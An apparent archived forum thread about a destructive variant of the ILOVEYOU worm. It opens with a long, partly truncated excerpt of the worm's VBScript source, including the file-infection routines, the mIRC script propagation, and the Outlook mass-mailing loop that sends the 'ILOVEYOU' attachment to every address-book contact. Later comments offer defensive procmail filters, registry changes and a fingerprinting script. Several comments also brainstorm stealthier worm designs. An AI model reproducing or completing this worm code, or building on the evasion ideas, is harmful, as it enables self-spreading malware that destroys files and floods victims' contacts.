scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,reg
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Softwar
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwa
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FO
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malea
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"
This HTML file need ActiveX Control
To Enable to read this HTML fileh r(91)) c hr(93)) h r(37)) Y OU.HTM") U .HTM",2)
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+c
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+c
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YO
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
Bullshit. It is a virus AND a worm. Viruses have payloads. If this was only a worm it would just propagate without a payload, tying up network resources.
If this kind of thing interests you, I did these two cartoons surrounding the original love-bug virus. 6th May, 8th May.
So use Eudora Pro! You'll get:
Overall a much better alternative to Outlook Express and M$.
TheGeek
http://www.geekrights.org
Kill the monkey
The changing subject line helps its messages avoid being deleted by the spam filters, but since the message does not change, the user is not likely to think that it actually came from the person it says it does. What these viruses need to do is examine the context of all of the messages in the user's Inbox that come from the individual who it is being sent to and generate a context-sensitive reply to that individual.
In addition, these viruses will ultimately not be limited to VBA. A program could easily open the default Netscape inbox text file and scan for the @ character--extracting all e-mail addresses in the entire Inbox file. The virus could also discriminate against which users it destructively affects--deleting only the files of people whose identity says they are in the aol.com domain, for instance.
I think that we have only seen the tip of the iceberg as far as intelligent viruses that are distributed by e-mail.
When run on wscript.exe and cscript.exe (the Windows scripting hosts responsible for VBScript execution) that will display a warning that the script could contain a virus.
SlashMirror: Where to put files for fellow /.'ers
The next version in this stepwise trojan refinement will automatically begin a Debian install after the Winblows files are deleted. Microsoft tactics hit the mainstream!
-L
So if you're so concerned with the bandwidth on the infected machine, have the virus code monitor CPU usage and network bandwidth and restrict its own usage to, say, ten percent of maximum or less. This makes it both less destructive - you wouldn't be shutting down anyone's machine, just redirecting otherwise unused CPU cycles - and more stealthy too.
If one criterion for the "success" of a virus or worm is the scope of its circulation, then it seems to me the guy who wrote this latest thing is screwing up. (Or more likely, he just hacked a few changes onto some existing code, probably ILOVEYOU, sure wish someone would post this new one so I could have a look at it.) This is entirely aside from the incomprehensible malice that's displayed by such a nasty payload, what a jerk. You're sure going to notice when something wipes practically all the files on your PC. It seems to me that a really well-written virus would be more subtle.
Yours WDK - WKiernan@concentric.net
...and write a trojan horse that changes all the Windows error messages.
For example, the GPF message: Another fine general protection fault, brought to you by the folks at M$! (little animated GIF of chibi Bill Gates dancing in a pile of money, throwing up handfuls of bills)
Sounds like a great idea!
I use windows and will never get affected. Why? Because I don't use outlook, I use good old Eudora. In fact I've been using Eudora since version 1.x and never been bothered by an email attachment.
I'm surprised no one has even thought of not associating .vbs files as executables with explorer, have notepad open them instead. You keep the useful scripting and end up with harmless text files.
Only the State obtains its revenue by coercion. - Murray Rothbard
What really gets me is the anguish and tormented sounding voices and inflections that reporters use on TV and radio when they report on virii/worms like Melissa and ILOVEYOU.
Today's media is run almost entirely off of emotion. I could take the typical hour long evening broadcast and condense it down to about 5 minutes if I filtered out all the emotion.
Do you think they'll ever learn?
As I remember, back in their early days, McAfee (later Network Associates), paid money for previously undiscovered viruses. They may have been doing exactly what you described, though with (arguably) better intentions.
> Pursuing the biological simile, observers pointed out another problem caused by Microsoft's monopoly: the lack of genetic diversity in the PC ecosystem.
Perhaps. However, for better or worse, diversity is in direct competition with standards compliance.
I'm all for diversity, at least in principle, but at some level it is always going to be desirable for me to be able to read files that you wrote, and for me to be able to run programs that you wrote (even if I have to recompile them first), and for me to be able to transport those files/programs from your system to mine. So long as these things are possible, viruses and worms will also be possible.
The problem here is the unmanaged automation of those otherwise desirable manifestations of interoperability.
What we really need as a first line of defense isn't diversity. It is for a certain vendor to realize that just because an idea can be implemented doesn't mean that it should be implemented. For a second line of defense, we need a public (or at least the tribe of sysadmins) to realize that just because a feature can be used/enabled doesn't mean that it should be used/enabled.
I am sure that there will be worms and viruses as long as there are bugs in security features, but meanwhile there is no point in making life easy for the script kiddies.
For better or worse, those who have been blaming the problem on stupidity - whether of the users or of their vendors - have it right.
I happen to like the idea that Joe Cluebie can play with a computer, which is why I advocate eradicating vendor stupidity as the first line of defense. Alas, when the world's largest vendor is Clueless, Inc., and willfully unwilling to obtain a clue, we may have to fall back on the 2LoD and train Joe Cluebie for self defense instead.
--
Sheesh, evil *and* a jerk. -- Jade
;-)
-- Your Servant, B. Baggins
>Yes, I could write a bash script or perl script
>that deletes files. Guess what, not everyone uses
>bash and has perl on their unix system, and if
>they did, it would only delete their user files,
>and NO system files would be affected.
Well, you could find a *nix common denominator, i.e. pretty much everything has a /bin/sh and /bin/rm, don't they?
I'll gladly criticize problems w/ Outlook's design, but I'll never say "that could never happen here" because it's too much like tempting fate.
My 2 cents: we shouldn't get too complacent about this type of thing. Another nasty *nix worm/virus of some sort is probably inevitable. The more that people celebrate the problems that MS is having right now, the harder we're all going to have our noses rubbed in it when the next Morris worm comes around.
if they'd released it near Valentine's Day :)
========================
63,000 bugs in the code, 63,000 bugs,
ya get 1 whacked with a service pack,
--- Grow a pair, liberals... stop letting the Republicans bully you!
I would suggest that this virus will be much less disruptive than the 'Love Bug' simply because after the initial infection, there are not any files left to infect.
So, the stupid ones will stop sending mail to the rest of us!
Of course it is, just like writing any other code. The same way that designing a nuclear bomb is physics.
Releasing a virus into the wild or dropping a nuclear bomb is an entirely different story. It's not the technology itself that's evil, but rather the application thereof.
Solution to blink tags: wrap them in another blink tag, with a javascript delay loop, so they cancel each other out
Then we could have free love. As well as a real GPL virus.
Damnit where are my moderator points when I need it, this thing should be +5 Insightful. ;]
It seems the only way administrators can TRULY be safe here, is to NOT ALLOW attachments on emails.
:)
:)
I work for a Checkpoint Firewall-1 reseller, and it is becoming apparent that our customers want their firewalls to strip out ALL scripts attached to emails (via CVP servers). This is a good first step, but why not just drop ALL attachments? That's what I would do. Users of an organization should have an ftp site to transfer files outside of the organization... That way complete control of what comes in and out is easy....
But, naturally, this won't happen, because users want to be able to send Word documents and jokes (i.e. jpgs and swf files) to each other...
I can't wait to see how many people click on THESE vbs scripts! It's just a matter of time before someone writes one that screws with the CMOS/BIOS and the MBR of the hard drive... funfunfun
Cybie! aka Ralph Bonnell
The latest nav for NT thinks that
D:\Perl\html\Perl-Win32\perlwin32faq12.html
from 6/24/99
is
"VBS.NewLove.A DRESSENT"
call me skeptical.
all your base may never have existed at all
C|Net and ZDNet are reporting that the new variant not only chooses random subject lines for its email carriers, but also adds comments to its own script, in an attempt to thwart fingerprinting.
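The self-inserted comments described above are enough to change a file hash, which is what naive fingerprinting compares. As an added example (not code from the report or from any AV vendor), the script below strips VBScript comments, collapses whitespace and folds case before hashing, so a comment-only variant still matches the original; the two sample scripts are constructed and harmless.

```python
"""Comment-insensitive fingerprint for VBScript samples.

Added example, not code from the article or from any AV vendor: it shows why
a variant that only inserts comments defeats a byte-for-byte hash, and how a
normalisation step restores the match.
"""
import hashlib
import re

_REM_LINE = re.compile(r"rem(?:\s|$)", re.IGNORECASE)


def strip_vbs_comment(line: str) -> str:
    """Drop a VBScript comment from one line, respecting "..." string literals.

    A line beginning with Rem is a comment. Otherwise the first apostrophe
    outside a string starts a comment; an apostrophe inside "..." is data.
    """
    if _REM_LINE.match(line.lstrip()):
        return ""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string  # a doubled "" toggles twice, net zero
        elif ch == "'" and not in_string:
            return line[:i]
    return line


def normalize_vbs(source: str) -> str:
    """Canonical form: comments removed, whitespace collapsed, case folded.

    VBScript keywords and identifiers are case-insensitive, so folding case
    is safe for them; string literals are folded too, which is fine for a
    fingerprint but would not be for execution.
    """
    lines = []
    for line in source.splitlines():
        code = re.sub(r"\s+", " ", strip_vbs_comment(line)).strip()
        if code:
            lines.append(code.lower())
    return "\n".join(lines)


def fingerprint(source: str) -> str:
    """SHA-256 over the normalised script rather than the raw bytes."""
    return hashlib.sha256(normalize_vbs(source).encode("utf-8")).hexdigest()


def raw_hash(source: str) -> str:
    """Plain SHA-256 of the bytes, for comparison with fingerprint()."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


# Two constructed, harmless scripts that differ only in comments, spacing
# and case, the kind of change the reported variant makes to itself.
ORIGINAL = """\
Rem constructed sample, not the worm
Dim greeting
greeting = "it's only a test"   ' apostrophe inside the string is data
MsgBox greeting
"""

VARIANT = """\
rem by: somebody else entirely
' an extra comment line inserted by the variant
DIM   greeting
greeting = "it's only a test"
msgbox greeting   ' trailing comment
REM another inserted comment
"""

if __name__ == "__main__":
    print("raw hashes match:       ", raw_hash(ORIGINAL) == raw_hash(VARIANT))
    print("normalised hashes match:", fingerprint(ORIGINAL) == fingerprint(VARIANT))
```

Line continuations (`_`) and `:` statement separators are not normalised here, so a variant that re-splits lines would still need a tokeniser-level comparison.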
My question: who actually needs email-attached scripts to have write access to the registry and filesystem? And who thought there were enough of these people to allow such access by default?
This virus may finally push a significant number of people over the edge to not running Windows (or at least no longer believing the "party line" from Redmond).
Why this virus? Because there is no effective cure yet. The "patch" issued earlier this week by MS is a joke both superficially (filter attachments by name) and fundamentally (see ntbugtraq). So we are now in a state where ANYONE who can program VBS (and who can't?) can create a self-propagating nightmare for network admins and there's no fix in the foreseeable future.
MS can't fix this problem from their end. It has to be solved by individual admins. And as soon as admins are allowed/forced to think for themselves without any input from The Beast, a significant number of them are going to wake up and realize the real solution: Ditch Windows.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
I posted this filter up on freshmeat as well, but now that there is a more destructive version of this floating about, it should be distributed more. All you admins who are using procmail can add these two rules to your global procmailrc to prevent the execution of .vbs attachments to email messages. The email isn't deleted, just that the file's extension is changed so that it will not execute on the end user's system.
:0 Bf2 /i;}' -e '/Content-Type:/{N; s/name=\(.*\)\.vbs\(.*\)/name=\1.vbs.txt\2/i;}' | /usr/local/bin/formail -i "X-Loop: viruscheck"
:0:
*!^X-Loop: viruscheck
*^Content-Disposition:[> ]+.*[Aa]ttachment.*\.[Vv][Bb][Ss].*
|/usr/local/bin/sed -e '/Content-Disposition:/{N; s/filename=\(.*\)\.vbs\(.*\)/filename=\1.vbs.txt\
$ORGMAIL
If you have any questions, please feel free to contact me about it.
I work for a NASA contractor. The Government head of our area got a copy of ILOVEYOU from one of our University partners. As we do satellite image processing, it was just conceivable that they might have legitimately sent us a pretty-picture executable, so he tried it.
He was on a Mac, so the program failed; he then forwarded it to another guy running Windows. He got clobbered when he ran it, and I got my copy from him. I read mail on a Unix box with Netscape (and I know better than to ever run an executable attachment), so I was safe.
This shows why e-mail is such an effective way to spread this stuff. The virus was passed from user to user without being executed, through machines where it couldn't execute, and was still dangerous when it arrived.
To a Lisp hacker, XML is S-expressions in drag.
2 more questions... How much does it cost (I'm just curious... if it's actually useful, I have no problem paying for it), and can it synchronize with my Palm?
I do believe I've found a version of Eudora that was integrated with PGP, though... That was really cool... if you had a key for a given recipient it would automatically encrypt the message for that person. Much better than Outlook's insistence on using only certificates that come from a "trusted" source and therefore cost $$$.
Of course the Mac version of Outlook doesn't seem to want to support any signing/encryption schemes, so it's a moot point.
Eudora Pro, you said? Maybe I'll go check it out....
.. everything looks like a nail.
It's a good filter and all, but what if someone actually wants to receive vb, js, com, bat, exe and God only knows what else?
This filter will protect the ignorant from themselves, but then again, so does Microsoft's 'solution' to the problem.
-- What you do today will cost you a day of your life.
Wouldn't it be sad if this virus got forwarded to some spam-list 'maintainer' who is dopey enough to keep all of his 'contacts' in MS Outlook? Come to think of it... about 80% of the mail I get is spam. I wonder why I haven't gotten one of these virii yet...
http://crummysocks.com
Go Here: http://www.dcaff.com/virus/
run Disable_VBScript.reg
if you have problems (like excel macros, run Enable_VBScript.reg)
have a nice day. =)
-andy
If a script has access to the same resources as a compiled program, both are capable of equal damage. VB script can access Windows' API which includes file i/o and the Windows registry. Perl isn't much different, it even has been used to create a hard-drive partitioning tool.
Java on the other hand does not have access to the operating system. It was designed for the sole purpose of downloading applications and scripts without ever worrying about the security of the computer or operating system. That is why Sun was so choked at Micros~1 for adding such features as API access to their virtual machine.
I predict in a few years, every program will be interpreted, BECAUSE of security. Why? Interpreters if designed properly are far more secure than compiled programs (ie Java, HTML). It's when interpreters (VB Script) get into the wrong hands, that is when they sink to the same level as compiled programs.
Ozwald
I think paragraph three would be even more to the point if you added the following two sentences...
(addition in italics)
Unfortunately, they also come up with the bright idea of executing email. This isn't a new idea, it's occurred to a lot of other people. They all just had more sense than to include such an obvious security hole in mass distribution software. Now MIME attachments aren't enough
Organizer:New England Rubbish Deconstruction Society;The NERDS,first US team in the UK Scrapheap Challenge/Junkyard Wars
MSK
what Karma whoring this post is!
All I was trying to do was bring laughter to the world *snif* *sob*
Finkployd
It is recommended that you remove this program imediately.
I woke up this morning to my radio. (Which is unusual. It usually takes my alarm going off at full volume for about 10 minutes. The alarm goes off after 10 minutes of full-volume radio.) I heard the announcer state that there was a new strand of the ILOVEYOU virus released, much more deadly. I just rolled over and went to sleep. I pity the fool who subjects himself to such things.
What type of real-life virus might computer viruses be comparable to? STD's? You 'sleep around' without protection, you'll get em. What might that make Microsoft products, then? :)
-------
CAIMLAS
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
No...I am 30. And my sister is technophobic..so no...our secretary is NOT my sister.
If you're not a Liberal in your 20's, then you have no heart.If you're still a Liberal in your 30's you have no brain.
>>Viruses are challenging and interesting.
>Yeah, like biological ones. But we don't go
>around spreading them happily, do we?
Happily enough; look at STD's.
>> Some of the ideas used in them have been
>> incorporated into modern software.
> Like? I can only think of BSOD as an example
> of payload.
I've seen a production system that has a component which delivers itself to hosts around the network as a virus. It has brakes, but it's a virus. It does real work in the real world.
-fb Everything not expressly forbidden is now mandatory.
1. Getting people to run the darn thing after all this. Of course you could just wait a month for everybody to forget about it.
2. For it to do any good it would have to be as prolific as ILOVEYOU was.
3. It would still cause headaches for administrators as their mail servers get over-loaded and shut them down, causing major disruptions.
4. It's still a virus so you would still be liable under the "Computer Abuse and Fraud Act". I don't think many people are that crazy.
5. Disabling scripting probably breaks others' applications and causes disruptions or damage.
On the upside though...
1. It would be self limiting, since if it was done correctly it would not be able to re-infect a PC.
2. You may be able to claim that what disruption and damage you caused prevents others causing serious disruptions and damage, and get a reduced sentence (not likely).
3. Get the adoration of other geeks by fixing a problem Micro$oft has not been able to fix. (I hope you really don't believe that)
So what geek out there is crazy enough to pull off a stunt like this? It's feasible, but I would not want to get caught!
subsolar
Really? You mean all those STD-10 (RFC-821) compliant mail servers are exactly identical? So we may as well all use <insert your favourite mail server here>? :-)
But seriously, you've got this backwards. Standards compliance permits diversity, by providing a common ground for diverse elements to interact over. It doesn't matter if your mail server is written in C, Perl, INTERCAL, or PostScript, it doesn't matter if the processing work is being done by a Pentium, an Athlon, a G4, or a Benedictine monastic order, as long as you speak SMTP, welcome to the club. And, with dozens of different servers out there, it's doubtful you can take all of them down with one exploit.
Speaking of which, anyone know of any buffer overflows you can use against a Benedictine monastic order? :-)
The fact that in this case, one of the branches of that big MUA tree has... questionable ideas about acceptable behaviour... is supposed to be dealt with by a little thing called ``survival of the fittest''. In theory. In practice, it seems you can suck rocks, as long as you breed like wildfire. :-(
@>-`--,--
I do have a cause. It's obscenity. I'm for it.
--Tom Lehrer
Teach your kids: "C++ made baby Jesus cry."
DO NOT LEAVE IT IS NOT REAL
Anyone that thinks Linux is immune from virii is a moron. These are just simple attachments that dumb people run on their machine. People can run attachments on any OS, folks. It's the USERS that are stupid, not the client or the OS.
I eat the flesh off the living, and I vote!
Sure, go ahead
:)
I'm flattered someone would actually want to reproduce one of my caffene induced posts
Finkployd
I actually like Outlook Express more than any other mail reader... Compared to say Netscape Messenger, Outlook can: receive mail from multiple POP boxes without needing to change identities, let you decide which account you'd like to send each mail from from the message composition window, has a much better rule system for filing messages, and it just plain looks nicer than any of the other apps I've used.
Too bad, though, that all these macro viruses don't seem to want to infect Macs.... I get to use good software without all the worries that go along with MSFT.... As a matter of fact, it seems that all of Microsoft's apps for the Mac are much better built than the same exact ones for Windows. How can Microsoft explain that, while also explaining that being broken up would destroy their "synergy", etc...?
One always wonders if there's some connection between the anti-virus companies and the virus writers.
There is an alternate path though, and that is when the virus is non-destructive (dormant) for a long period, and then flares up to become extremely destructive. AIDS, for instance. Many computer viruses have followed this path as well, with a built-in "time-bomb" date.
Personally, I think the most interesting virus would be totally non-destructive, and would not bother the infectee by consuming resources. (i.e. your example of monitoring CPU and network) Some people have predicted that the first true AI will be an entity that grows out of the network. I think this is exactly the way to do it. Someone suggested a small daemon that communicates with itself. I have seen code that changes its name every second, to prevent killing, and obscure it in 'ps' output. Monitoring load and network bandwidth is pretty easy, even for a program that isn't running as root. I wonder if someone will eventually write this...
--Bob
1^2=1; (-1)^2=1; 1^2=(-1)^2; 1=-1; 1=0.
can anyone post it? I am interested in what this one does.
-If at first you don't succeed, call it version 1.0.
When he was in college, Bill Gates worked as a waiter. One day, a customer calls him: "Hey, Bill, there is a fly in my soup." Bill comes over, looks at the soup, examines it, and walks away. "Aren't you going to do anything?" the customer asks. "Oh, don't worry about the fly, it isn't a bug, it's a feature."
Hopefully I didn't put any [] around my words.
You are ignorant if you think that these e-mail viruses will only use VBA/Outlook Express as a distribution mechanism. They could just as easily be distributed as an .exe file that searches the hard disk for the text file that contains the Netscape Inbox messages. It could then extract all e-mail addresses (not just "Contacts") and intelligently concoct a reply based on the content of the message it found the address in. While they are likely to only affect the Windows platform, it would be just as easy to write a Linux version.
I think that we have only seen the tip of the iceberg as far as intelligent viruses are concerned. It would be very easy to target a particular organization by only deleting users' files if the user identifies himself within a particular domain (i.e. aol.com) and otherwise just replicating. People need to learn not to open e-mail attachments that they do not expect to receive.
ByteMyCode.com: A Web 2.0 code sharing community.
I remember the Good Times virus. That was the hoax that was always mentioned. Now with all the security problems, that can actually be done. Say, why hasn't someone created an email that completely follows the Good Times virus, including the subject?
I am a bad speler. Please ignore speling meestakes in me poast.
-coyo
--------------------------------------------------
This is my sig. There are many like it, but this one is mine.
--------------------------------------------------
I just read a news report about the new virus, and the warning they're giving about it is for people to avoid messages with .VBS attachments, because the subject of the new variant changes dynamically. Since ".VBS" is how DOS signifies file types, and since Macintosh uses a less visible means of specifying file types, I began to think of ways, architecturally, this would work on a Mac. It seems like AppleScript would foot the bill. Most machines have it installed by default, it's executable content, a file, and isn't Outlook scriptable? I'm wondering if AppleScript could get Outlook to do the same sorts of things. . .
I'm not a virus writer, but if there are any out there, wouldn't similar functionality be possible through the use of Outlook/Macintosh and an AppleScript attachment?
I just remembered this old Metallica song. . .
These are my friends, See how they glisten. See this one shine, how he smiles in the light.
Grin... I remember getting that one. It's pretty old, originally being a parody of the "Good Times" virus hoax. Ironically, the Good Times virus was purported to be a virus that you could get just by reading an infected e-mail, which would have the subject line "Good Times." It would do horrible things to your computer and send it out to all of your friends. At the time, people who were "in the know" laughed off the idea that a virus could actually do that, and the "Bad Times" joke was based on that idea.
And now, it turns out that Good Times was real after all, they just got the name wrong and called it early...
I'm installing a subspace harmonics dampener as we speak. Don't want to take any chances.
-jacob
Hmmm, then the vaccine wouldn't make it very far.
Later...
KangarooBox - We make IT simple!
A note about posting as extrans: it seems that that and the "plain text" posting options have been switched since posting as plain text will activate any HTML in your comments.
Ideology is for ideots.
Pine was cool in the 80s, but it just doesn't cut it anymore for me.
I eat the flesh off the living, and I vote!
You've never heard of FortRes?? We use it on some of our WinBloze boxen, and, while it doesn't stop users from trying to install stuff, they get screwed when they try to reboot, because they don't know the box pword OR the FortRes pword. Ha! Plus of course we use (constantly updated) McAfee antiviral software AND we don't run any M$ email programs (on the public boxen).
We run 50 win boxen (half and half public / staff) and the only place I saw the virus was on /. when someone posted the code. (My staff is educated enough not to open unsolicited attachments, even though some of them use Outlook. I took the time to explain the whole thing very carefully at a staff meeting after the Melissa fiasco.) So education *does* work, but only for motivated users.
I certainly agree with your last point: you can't ignore user ignorance.
DNA is a Turing machine. You, however, being dynamic and emergent, are not.
(Disclaimer. I'm a consultant onsite at a Fortune 100 company.)
:-)
First, it's not my choice.
Second, none of the really powerful CAD packages run on Linux. Most of the workers here are ME's and EE's. I'm talking about CAD drawings that'll take a multiprocessor HPUX box with 4G of RAM to its knees.
Third, there's management fear. Fear of the unknown.
Fourth, the whole accounting group has unbelievably complex macros written in 123 and Excel. The cost of transitioning 50,000 people to free software (converting macros, user training) is magnitudes above the expense of paying MS or Lotus an annual fee.
Fifth, there is an expense in transitioning from one system to another. It's not just about the price of the software.
Sixth, the whole help/support staff would have to be retrained. Since there aren't flashy certifications in free software (or dern few of them), most people wouldn't think it's a worthy goal. Most employers, if you say, "I _wrote_ product X" wouldn't care. If you said, "I'm certified in Product X," you'd probably get the job.
Seventh, free software is a pretty nice solution, but it's another tool in the toolbox, not /the/ tool.
Eighth, did I already mention that it's not my choice? There is a groundswell toward linux building here, but it'll likely take the attrition of the older employees before it becomes the standard.
In the wake of the original iteration of the Love Bug, President Clinton finally uttered those delightful words "national security." The logical extension of this (at least as logical as anything from within the DC Beltway is ever likely to get) would be that the Congresscritters pass a bill declaring virus writers and crackers as terrorists.
Then our various flavors of quick-response folks who make a fashion statement out of black Kevlar could do their thing. Best of all, Judge Jackson could finger Windows as a great big virus and next thing you know, there go Gates and Ballmer in cuffs.
"How many light bulbs does it take to change a person?" --BMcC-->
Virus Experts are predicting that the spread of this variant will be slower than the original Lovebug virus, because of the 'mutation' that it tries to perform on itself. Every time it mutates, it adds up to 10 lines of crap to itself, in order to try to avoid detection. It ends up being huge after a moderate number of iterations.
Have a look at Symantec's information.
~P
That was witty...
Sounds like a lyric a bad highschool band would come up with.
Blar.
It's a complex balance between good and evil that must exist. If writers stopped creating virii, there would be no need for protection. Users would go on their blissful way until one person takes advantage of the peacefulness to collapse the system.
Most times, it's just something that would be great to watch, seeing a creation of your own cause mass destruction. Or even, knowing that it is able to cause destruction, then seeing a naive person steal the code from your machine and send it out.
The first ILOVEYOU hit our company hard. We took the Exchange down, updated all the mail servers, and the network-wide virus scanning for all the users' computers. However, the problem was that idiot users were mapped to production web boxes, and caused the virus to spread to machines that we didn't think would ever have to be checked. It's because of this infection that now we spent hours installing AV clients on 120+ production servers.
As a whole, ILOVEYOU wasn't too drastic. It deleted some web images that we just had to restore. But it was because we got hit that we're now prepared to defend against virii like this new ILOVEYOU, which does drastic damage.
I want to be able to execute attachments I receive easily. I want these attachments to be able to do what I can do. What I don't want is for these attachments to be able to do stuff without my explicit permission to do so.
I don't like the idea of sandboxed execution or chmoding the user permissions because they make it a pain-in-the-ass to actually do stuff that I want them to be able to do.
\begin{daydream}
What I'd like to see is to see sandboxed execution or editing (instead of executing) being the default and it should be simple as a right-click "Execute" to allow an attachment to actually execute and do stuff. I'd also like to be able to easily tell it when I want to just view the thing and when I actually want to execute.
\end{daydream}
PS: Damnit, I'm trying to post using Plain Old Text. Why won't Slashdot let me use XML tags for my "daydream"??
Mmmm.. Donuts
Well, too bad! Because we're back there again, and nobody is ever going to be able to send an attachment without first calling the recipient.
So call your old university and get your VAX account back. It's the tightest send in the file sending business.
-Omar
[HKEY_CLASSES_ROOT\vbsfile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\vbsfile\Shell\Open2]
@="Open &with Command Prompt"
[HKEY_CLASSES_ROOT\vbsfile\Shell\Open2\Command]
@="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
Doing so will disallow the default open and run behavior. This will not keep you from running the scripts, if you really want to. You just have to be explicit about it now, ie 'cscript blah.vbs'
Beware though that there are also other macro language files to watch out for ( and I am surprised no viruses written in them have surfaced yet! )
For Example:
[HKEY_CLASSES_ROOT\WSFFile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\WSFFile\Shell\Open2\Command]
@="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\WSHFile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\WSHFile\Shell\Open2\Command]
@="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\JSEFile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\JSEFile\Shell\Open2\Command]
@="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\jsfile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\jsfile\Shell\Open2\Command]
@="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\PerlScriptFile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\PerlScriptFile\Shell\Open2\Command]
@="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\VBEFile\Shell\Open\Command]
@="C:\\WINNT\\System32\\WScript.exe \"%1\" %*"
[HKEY_CLASSES_ROOT\VBEFile\Shell\Open2\Command]
@="C:\\WINNT\\System32\\CScript.exe \"%1\" %*"
etc, etc.. A search for CScript in your registry will find all the interesting items.
You made some excellent points.
I'd like to add, however, that most computers are single-user devices now and there aren't typically "other users files" on your computer. I also read somewhere that with Win2K it's not possible to overwrite system files. (although I suppose a virus could just as easily destroy non-system applications).
Mmmm.. Donuts
If I may quote my favorite CEO: "Pursuing the biological simile, observers pointed out another problem caused by Microsoft's monopoly: the lack of genetic diversity in the PC ecosystem. Because PCs and their software are too similar, one noxious automaton can do much more damage than would occur if we had several alternative life forms.
This argument deserves closer examination. True, BeOS, MacOS, and Linux users were not infected by the Love virus. Had each system had 25% market share, a single virus could only infect 25% of the population."
The ILOVEYOU virus is kindergarten stuff compared to what a real programmer could really do if he/she put their mind to it, but since experienced programmers are (most of the time) fairly mature individuals... it would only take one fairly good hacker to release a plague on the world...
>Q. Is Linux and UNIX impervious to viruses?
